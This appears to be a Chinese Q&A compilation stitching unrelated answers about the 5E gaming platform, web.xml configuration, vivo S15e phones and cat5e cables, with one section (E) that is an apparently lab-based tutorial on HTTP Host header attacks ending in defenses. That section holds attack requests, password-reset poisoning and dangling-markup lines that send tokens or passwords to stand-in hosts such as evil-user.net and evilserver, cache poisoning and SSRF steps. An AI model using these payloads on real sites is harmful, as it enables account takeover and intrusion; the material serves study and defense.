5e配置文件被拦截会有什么影响

A. 5E对战平台打开CSGO没反应

可能是机器设置问题，5E会有提示怎么防止文件被拦截，还有跟电脑的配置也有一定的影响，在等待期间建议不要运行其他程序

B. web.xml文件主要配置有哪些,都有什么含义

①web.xml文件是用来配置：欢迎页、servlet、filter等配置文件用的。当你的web工程没用到这些时，你可以不用web.xml文件来配置你的web工程

web.xml的模式文件中定义的标签并不是定死的，模式文件也是可以改变的，一般来说，随着web.mxl模式文件的版本升级，里面定义的功能会越来越复杂，

也即标签元素的种类会越来越多，但有些是不常用的，我们只需记住一些常用的就可以了。

首先是定义头和根元素

声明为xml文件，版本为1.0，编码为utf-8

声明该文件的内容可以使用xsi的标签库

声明标签的使用范围是被javaee的开发使用的

声明可以使用的标签库和对应的具体的标签库版本地址。

web.xml的模式(Schema)文件中定义了多少种标签元素，它就能拥有定义出来的那些功能

随着web.mxl模式文件的版本升级，里面定义的功能会越来越复杂，也即标签元素的种类会越来越多.

定义项目的名称.

项目名称

欢迎页面

servlet

配置springmvc DispatcherServlet( 前台控制器)-->example这个Servlet的名字是example，可以有多个DispatcherServlet，是通过名字来区分的。

async-supported

启动一个新的线程去处理你的请求，完成之后调用你指定的回调函数来完成整个异步操作。

一般的jsp是通过地址栏输入一个地址，或者提交表单的方式发送请求的，这样网页都会被刷新。但是如果你在jsp页面发送一个ajax请求的话，跟前两种不同，

后台会返回给jsp页面内容，页面不会直接刷新，这样可以把返回的数据写在页面的div中，这样就完成了页面的局部刷新。

举个例子，你做一个查询功能，页面上有查询条件和查询结果显示区域，你可以点查询按钮的时候通过ajax异步发送你的查询条件，

而你得到后台返回的查询结果后，更新你的jsp页面的查询结果，jsp的其他部分，比如查询条件，都没有更新，jsp没有刷新，而是更新了查询结果这一块内容

  url-pattern   默认匹配所有请求Servlet拦截匹配规则可以自已定义1、拦截*.do、*.htm， 例如：/user/add.do,这是最传统的方式，最简单也最实用。不会导致静态文件（jpg,js,css）被拦截。2、拦截/，例如：/user/add,可以实现现在很流行的REST风格。很多互联网类型的应用很喜欢这种风格的URL。弊端：会导致静态文件（jpg,js,css）被拦截后不能正常显示。

监听器

Listener获取的是Web应用ServletContext（application）的配置参数。-为Web应用配置Listener的两种方式： 使用@WebListener修饰Listener实现类即可 在web.xml文档中使用进行配置。我们选择web.xml这种配置方式，只有一个元素指定Listener的实现类.

②启动WEB项目的时候,Tomcat容器首先会去它的配置文件读取两个节点listener和context-param。

然后Tomcat会创建一个ServletContext(application),WEB项目所有部分都将共享这个上下文

将applicationContext.xml存入ServletContext中

Tomcat容器根据class类路径来创建监听

上面这些都是在web项目还没有完全启动起来就完成的工作,而servlet是在第一次发起请求时被实例化的

而且一般不会被容器销毁,并服务于多个用户的请求.

web.xml的加载顺序是: context-param-> listener -> filter -> servlet.

filter

Filter可认为是Servlet的“增强版”，因此Filter配置与Servlet的配置非常相似，需要配置两部分：配置Filter名称和Filter拦截器URL模式。区别在于Servlet通常只配置一个URL，而Filter可以同时配置多个请求的URL。配置Filter有两种方式：

在Filter类中通过Annotation进行配置。

在web.xml文件中通过配置文件进行配置。

①网络

②http://blog.csdn.net/believejava/article/details/43229361

1.在web.xml里配置监听器、过滤器、拦截器，书写顺序有没有什么要求？

根据网上资料来分析,应该是没有书写顺序的要求,容器会按照自己的加载方式去加载顺序.

2.监听器是必须要配置的吗？

不是必须要配置.

3假设配置了多个listener,那么会先加载哪个listener

如果有多个listener的情况下,我们可以根据自己的需要去手动设置先去加载哪个listener.

今天的分享就到这里啦，欢迎大家点赞、转发、留言、拍砖~

技能树.IT修真院

“我们相信人人都可以成为一个工程师，现在开始，找个师兄，带你入门，掌控自己学习的节奏，学习的路上不再迷茫”。

这里是技能树.IT修真院，成千上万的师兄在这里找到了自己的学习路线，学习透明化，成长可见化，师兄1对1免费指导。快来与我一起学习吧~

http://www.jnshu.com/login/1/14708688

PPT :  https://ptteng.github.io/PPT/PPT-java/Java-task2-webxml.html#/

C. vivoS15e怎么查我把对方电话拉黑了,看看对方来电没有怎么查看

vivo S15e机型查看拦截黑名单的记录：可以进入i管家--实用工具--骚扰拦截--电话拦截/信息拦截--电话拦截记录/拦截记录里查看。

D. 1*cat5e跟utp-cat 5e有什么区别

utp5e和cat5e的区别：

1、超五类网线无法和超五类非屏蔽双绞线相比，因为超五类网线包括超五类非屏蔽双绞线，所以它们无法进行比较区分，只能问超五类屏蔽网线和超五类非屏蔽网线有什么区别。

2、STP外面由一层金属材料包裹，以减小辐射，防止信息被窃听。同时具有较高的数据传输速率，但价格较高，安装也比较复杂；UTP无金属屏蔽材料，只有一层绝缘胶皮包裹，价格相对便宜，组网灵活；

utp5e和cat5e的关系：

CAT 5E超五类网线分为UTP 5E超五类非屏蔽双绞线和STP 5E屏蔽超五类屏蔽双绞线，非屏蔽双绞线电缆是由多对双绞线和一个塑料外皮构成。五类是指国际电气工业协会为双绞线电缆定义的五种不同的质量级别。

E. weblogichost头攻击配置

1. HTTP Host头攻击

从HTTP / 1.1开始，HTTP Host标头是必需的请求标头。它指定客户端要访问的域名。例如，当用户访问https://example.net/web-security时，其浏览器将组成一个包含Host标头的请求，如下所示：

GET /web-security HTTP/1.1
Host: example.net
HTTP Host头的目的是帮助识别客户端要与之通信的后端组件。如果请求不包含Host头或者格式不正确，则在将传入请求的应用程序时可能会导致问题。

从历史上看，这种漏洞并不存在太大问题，因为每个IP地址只会被用于单个域的内容。如今，很大程度上是由于同一个IP上存在多个Web应用程序（不同端口，不同域名解析等），通常可以在同一IP地址访问多个网站和应用程序。这种方法的普及也部分是由于IPv4地址耗尽所致。

当可以通过同一IP地址访问多个应用程序时，最常见的原因是以下情况之一：

虚拟主机

单个Web服务器托管多个网站或应用程序。这可能是具有单个所有者的多个网站，但是也可能是不同所有者的网站托管在同一个共享平台上。它们都与服务器共享一个公共IP地址。

通过代理路由流量

网站托管在不同的后端服务器上，但是客户端和服务器之间的所有流量都通过代理系统进行路由。这可能是一个简单的负载平衡设备或某种反向代理服务器。在客户通过内容分发网络（CDN）访问网站的情况下，这种设置尤其普遍。

在上面两种种情况下，即使网站托管在单独的后端服务器上，它们的所有域名也都解析为中间组件的单个IP地址。这带来了与虚拟主机相同的问题，因为反向代理或负载平衡需要知道每个请求到的哪个后端上。

HTTP Host头的作用就在于，指定请求应该发送到那个应用程序的后端服务器上。打个比方，一封信需要送到居住在公寓楼中的某人手中，整个公寓有许多房间，每个房间都可以接受信件，通过指定房间号和收件人（也就是HTTP Host头）来将信封送到指定的人手中。

3. 什么是HTTP Host头攻击

一些网站以不安全的方式处理Host头的值。如果服务器直接信任Host头，未校验它的合法性，则攻击者可能能够使用此可控变量来注入Host，以操纵服务器端的行为。

现成的Web应用程序通常不知道将它们部署在哪个域上，除非在安装过程中在配置文件中手动指定了该域。例如，当他们需要知道当前域以生成电子邮件中包含的绝对URL时，他们可能依赖于Host头中的值：

<a href="https://_SERVER['HOST']/support">联系支持</a>
Host头值还可以用于不同网站系统之间的各种交互。

由于Host头实际上是用户可控制的，因此这种做法可能导致许多问题。如果未校验或者直接使用Host头，则Host头可以与一系列其他漏洞“组合拳”攻击，比如：

缓存投毒

特殊业务功能的逻辑漏洞

基于路由的SSRF

经典服务端漏洞，如SQL注入（当Host被用于SQL语句时）等

4. 如何发掘HTTP Host头攻击

首先要判断服务端是否检测Host头？检测完了是否还使用Host头的值？

通过修改Host的值，如果服务端返回错误信息：

.png
则说明服务端检测了Host的内容。至于有没有使用Host头的值，有以下几种方法去发掘：

修改Host值

简单的来说，可以修改HTTP头中的Host值，如果观察到响应包中含有修改后的值，说明存在漏洞。

但有时候篡改Host头的值会导致无法访问Web应用程序，从而导致“无效主机头”的错误信息，特别是通过CDN访问目标时会发生这种情况。

添加重复的Host头

添加重复的Host头，通常两个Host头之中有一个是有效的，可以理解为一个是确保请求正确地发送到目标服务器上；另一个则是传递payload到后端服务器中。

GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff
使用绝对路径的URL

尽管许多请求通常在请求域上使用相对路径，但是也同时配置了绝对URL的请求。

GET https://vulnerable-website.com/ HTTP/1.1
Host: attack-stuff
有时候也可以尝试不同的协议，如HTTP或HTTPS。

添加缩进或换行

当一些站点block带有多个Host头的请求时，可以通过添加缩进字符的HTTP头来绕过：

GET /example HTTP/1.1
Host: attack-stuff
Host: vulnerable-website.com
注入覆盖Host头的字段

与Host头功能相近的字段，如X-Forwarded-Host、X-Forwarded-For等，这些有时候是默认开启的。

GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff
诸如此类，还有其他的字段：

X-Host

X-Forwarded-Server

X-HTTP-Host-Override

Forwarded

忽略端口仅校验域名

当修改、添加重复Host头被拦截的时候，可以尝试了解Web应用程序是怎样解析Host头的。

比如，一些解析算法会忽略Host头中的端口值，仅仅校验域名。这时候可以将Host修改为如下形式：

GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff
保持域名不变，修改端口值为非端口号的其他值（非数字）， 将Host头攻击的payload放在端口值处，同样能进行Host头攻击。

5. HTTP Host头攻击漏洞示例

5.1 密码重置中毒

根据HTTP Host头攻击的攻击特点，它被广泛应用于密码重置中毒：攻击者可以操纵网站在重置密码情况下生成的密码重置链接，使其发送攻击者指定的域下，利用此来窃取重置任意用户密码的令牌。

.png
一个重设密码（忘记密码）功能的大致流程如下：

用户输入其用户名或电子邮件地址，然后提交密码重置请求。

该网站检查该用户是否存在，然后生成一个临时的、唯一的、复杂的令牌，该令牌与后端的用户帐户相关联。

该网站向用户发送一封电子邮件，其中包含用于重置其密码的链接。重置令牌的参数包含在相应的URL中：

https://normal-website.com/reset?token=0a1b2c3d4e5f6g7h8i9j
4. 当用户访问此URL时，网站将检查提供的令牌是否有效，并使用它来确定要重置哪个帐户。如果一切都符合，则可以进入用户重置密码步骤。最后，令牌被销毁。

以上步骤的安全性依赖于：只有目标用户才能访问其电子邮件，从而可以访问其唯一的令牌。

密码重置中毒是窃取此令牌以更改另一个用户密码的一种漏洞。

如果网站重置密码的流程完全依赖用户的可控输入（如HTTP Host头），这可能导致密码重置中毒：

1. 攻击者获取受害者的用户名或者电子邮件，作为提交重置密码的请求，攻击者会拦截请求并修改HTTP Host头为其指定的域，如evil-user.net

2. 受害者会收到一封重置密码的邮件，但由于攻击者修改了Host头，而web程序生成重置链接又完全依赖于Host头，导致生成以下URL：

https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j
3. 如果受害者点击了该链接，重置密码的令牌就会发送到攻击者的服务器 evil-user.net 上

4. 当攻击者获取到虫子密码的令牌之后，就会进行相应的构造访问真实重置密码的URL进行密码重置。

5.1.1 密码重置中毒—基础

详细了解了上面的密码重置中毒的流程和原理之后，这里通过HTTP Host头攻击导致的基础的密码重置中毒来演示。

首先输入用户名或者用户的电子邮箱来重置指定用户的密码：

.png
提交之后，会发送一封重置密码的电子邮件到wiener用户的邮箱中（数据包如右图）：

.png
注意重置密码的链接，可能是受Host头的值的影响？

我们来验证一下是否存在HTTP Host头攻击，修改Host头的值为 .com：

.png
发现请求是可以被后端服务器接收的，所以是存在HTTP Host头攻击的。

这里就输入受害用户carlos进行重置密码，然后抓包将Host头的值改为我们自己的服务器：

.png
然后在我们自己的服务器上就可以通过访问日志看到被窃取的重置密码Token：

.png
然后根据已知链接规律，构造重置密码的链接：

https://.web-security-academy.net/forgot-password?temp-forgot-password-token=
.png
随即进入输入新密码的界面，密码重置中毒成功。

5.1.2 密码重置中毒—注入覆盖Host头的字段

有时候直接修改Host头、添加重复Host头的值以及混淆Host头都不行：

.png
可以尝试使用与Host头功能相同的HTTP字段，如X-Forwarded-Host、X-Forwarded-For等，可以进行Fuzz：

.png
实际上他能够被 X-Forwarded-Host 字段影响，导致Host头攻击，当同时添加多个字段使请求被拦截时，可以尝试类似排除法、二分法来排查哪个字段有效。

对受害用户carlos进行密码重置投毒：

.png
然后构造链接即可：

https://.web-security-academy.net/forgot-password?temp-forgot-password-token=
.png
5.1.3 重置密码中毒—Dangling Markup技术

首先简单介绍一下 Dangling Markup技术：

Dangling markup技术

Dangling markup技术, 是一种无需脚本即可窃取页面内容的技术，它使用图像等资源(结合CSP运行的策略)将数据发送到攻击者控制的远程位置。当反射型XSS不工作或被内容安全策略（CSP）阻止时，它非常有用。其思想是插入一些未完成状态的部分HTML，例如图像标记的src属性，页面上的其余标记关闭该属性，但同时将两者之间的数据(包含窃取页面的内容)发送到远程服务器。

例如，我们在反射型XSS注入点上注入这样一个img标签：

<img src="https://evilserver/?
则注入点和下一个双引号的代码将会发送到攻击者的 https://evilserver 服务器, 其中被发送的代码或者内容可能包含一些敏感信息, 例如CSRF Token等, 配合反射型XSS以完成CSRF的利用。

关于 Dangling Markup技术 的实战意义可以参考博主之前的文章：绕过CSP之Dangling markup技术

什么时候可以使用 Dangling Markup技术 呢？与我们这篇文章的主题有什么关系呢？

我们直接进入主题，当输入需要重置密码的用户名后，该用户的邮箱内会收到如下邮箱：

.png
有一个跳转到登录界面的链接，后面紧接着重置之后的随机密码。

此时考虑一下，该链接是否是从Host头取值而来？只要这个值可控，那么就可以利用Host头攻击实施 Dangling Markup攻击，包含住链接后面紧跟着的密码，再结合Host头攻击将请求指定到攻击者服务器上。一个漫天过海的窃取行为就完成了。

第一步，寻找Host头攻击点：

通过Fuzz，可发现Host头攻击类型为 忽略端口仅校验域名。即服务端在校验Host域的时候，仅校验了域名，忽略了后面的端口号，造成端口值可控（可以是数字或字符）：

.png .png
通过在Host头的端口中注入payload，依旧可以实现Host头攻击。

第二步，借助可控变量 Host：ip:port 来实施 Dangling Markup技术，从而将后面的密码外带到攻击者服务器上：

注意，需要闭合此处的双引号出去，经过尝试，输入单引号时，服务端会自动转为双引号，故这里通过单引号将双引号闭合，然后添加自定的<a href=xxx.attack-domain>标签将密码外带：

.png
原本的正常HTML是这样的：

.png
通过Dangling Markup技术 在a标签的链接中注入? 符，使得后面的值在双引号闭合之前全部被当做URL参数请求到攻击者服务器上：

.png
这也是 Dangling Markup技术 的精髓所在，该技术的核心点在于：

可控变量后面是否接着需要窃取的关键数据（包括Token、密码等）
在攻击者服务器上可以看到被Host头攻击转发上来的请求，里面成功窃取了受害者重置后的密码：

.png
5.2 Host头攻击+缓存投毒

当存在Host头攻击的web站点不存在密码重置的功能的时候，此时该漏洞就显得没有影响，因为不可能驱使用户去抓包修改Host头，辅助攻击者完成一系列的攻击。

但是，如果目标站点使用Web缓存，则可以通过缓存投毒给其他用户提供带有病毒的缓存响应。此时的Host头攻击漏洞转变为类似XSS存储型类的漏洞。要构造Web缓存投毒攻击：

1. 需要寻找映射到其他用户请求的缓存键；
2. 下一步则是缓存此恶意响应；
3. 然后，此恶意缓存将提供给尝试访问受影响页面的所有用户。
第一步，寻找Host头攻击点：

通过对站点的主页添加重复的Host值，可以达到覆盖的效果，并验证存在Host头攻击：

.png
第二步，寻找是否使用了Web缓存？缓存键是什么？

从上图中也可以发现，站点使用了Wen缓存功能，并且配合Host头攻击，可以缓存/resources/js/tracking.js资源文件。

第三步，在攻击者服务器上创建一个同名的 /resources/js/tracking.js资源文件，内容为：

alert(document.cookie);
然后通过Host头注入攻击者服务器域名，可以看到在响应中正确地对应了我们的 /resources/js/tracking.js资源文件：

.png
发送多次请求，使该请求的响应变为缓存：

.png
当其他用户请求站点主页时，服务端就会提供该恶意缓存给用户，造成缓存投毒。

5.3 Host头攻击绕过访问控制

出于安全考虑，通常网站对某些功能的访问限制为内部用户使用。但是通过Host头攻击一定可能上可以绕过这些限制。

对于一个站点，从发现Host头攻击到利用，下面来展示一个完整的流程：

第一步，访问主页，随意修改Host的值：

.png
注意，这里的Host的值不会出现响应包中，但是依然可能存在Host头攻击，因为响应依然成功，说明服务端没有对Host头做验证。

第二步，寻找敏感页面，通过 /robots.txt 知道 /admin 为做了访问控制的页面：

.png
可以错误信息提示，/admin 页面只允许本地用户访问。

第三步，将Host改为服务端内部地址，从而绕过IP访问控制：

.png
5.4 Host头攻击+SSRF

Host头攻击可能会导致基于路由的SSRF攻击，称为：Host SSRF Attack。

经典的SSRF攻击通常基于XXE或可利用的业务逻辑，将用户可控的URL作为HTTP请求发送；而基于路由的SSRF依赖于云部署的体系结构中，包括负载均衡和反向代理，这些中间件将请求分配发送到对应的后端服务器处理，如果服务端未校验Host头转发的请求，则攻击者可能会将请求发送（重定向）到体系中的任意系统。

这可能需要知道内部系统的IP地址（私有地址），一般可以通过信息收集或者Fuzz来判断有效的私有IP地址（如枚举192.168.1.1/16）。

5.4.1 基础Host头攻击+SSRF

比如，普通方式访问不到 /admin 页面（404）：

.png
猜测 /admin 存在于内网中，需要内网机器才能访问，但是配合Host头攻击+SSRF可以绕过并访问。

第一步，判断Host是否被使用，可用DNSLog外带

这里我使用Burp自带的 “Burp Collaborator client” 来实现外带：

.png
说明服务端是根据Host头的域名来请求资源的。

第二步，基于Host头的SSRF探测内网主机

假如一些敏感的页面（比如管理页面），深处于内网，外网无法访问，但是通过Host头攻击+SSRF可达到绕过访问控制，从而访问内网资产，这里Fuzz内网的IP的C段为192.168.0.0/24，直接利用Intruder枚举：

.png .png
得到内网IP为192.168.0.240

第三步，访问内网资源

构造 /admin 页面，在Host处换位内网IP：

.png
5.4.2 Host头攻击+SSRF—使用绝对路径的URL

有时候服务端会校验Host头的值，如果Host被修改，服务端会拒绝一切修改过后的请求：

.png
普通请求通常在请求域上使用相对路径，但是，服务端也同时可能配置了绝对URL的请求，采用如下形式可绕过对Host的验证：

GET http://.web-security-academy.net/ HTTP/1.1
.png
接着用 “Burp Collaborator client” 进行外带：

.png
外带成功，说明Host头被服务端使用来向指定域名请求资源，直接SSRF爆破内网：

.png
访问内网页面：

.png
6 HTTP Host头攻击防护

最简单的方法是避免在服务器端代码中完全使用Host头，可以只使用相对URL。

其他方法包括：

6.1 正确配置绝对域名URL

当必须使用绝对域名URL时，应在配置文件中手动指定当前域的URL，并引用配置的值，而不是从HTTP的Host头中获取。这种方法可防止密码重置的缓存投毒。

6.2 白名单校验Host头的域

如果必须使用Host头，需要正确校验它的合法性。这包括允许的域，并使用白名单校验它，以及拒绝或重定向对无法识别的主机请求。这包括但不仅限于单个web应用程序、负载均衡以及反向代理设备上。

6.3 不支持主机头覆盖

确保不适用与Host头功能相近的字段，如X-Forwarded-Host、X-Forwarded-For等，这些有时候是默认开启的。

值得一提的是，不应该将内网使用的Host主机（不出网）与公网的应用程序托管在同一个服务器上，否则攻击者可能会操纵Host头来访问内部域。

F. 5e僵尸逃跑怎么屏蔽僵尸声音

1、首先打开5e僵尸逃跑游戏进入界面。
2、其次点击游戏设置。
3、最后找到声音设置点击屏蔽僵尸声音即可。

G. vivos15e配置

vivo S15e机型主要参数：
操作系统：OriginOS Ocean（基于Android 11）
屏幕：6.44英寸，分辨率2404 × 1080
拍照：后置：5000万像素主摄+800万像素超广角镜头+200万像素微距镜头；前置：1600万像素
处理器：Exynos 1080 八核 2.8GHz*1+2.6GHz*3+2.0GHz*4
外观尺寸：159.7*73.6*8.49 mm
电池容量：4700mAh（典型值），不可拆卸电池
重量：雾凇⾦：约190.8g，冰晶蓝、萤⽯⿊：约189.8g
SIM卡规格：双Nano卡
网络支持：联通电信2G、3G、4G、5G网络；移动2G、4G、5G网络
机身内存：8G RAM+128G/256G ROM 、12G RAM+256G ROM
扩展存储：不支持扩展存储
连接：Type-C接口、双频WiFi、蓝牙5.2、GPS、OTG
感应器：重力感应器、接近感应器、光敏感应器、陀螺仪、电子罗盘。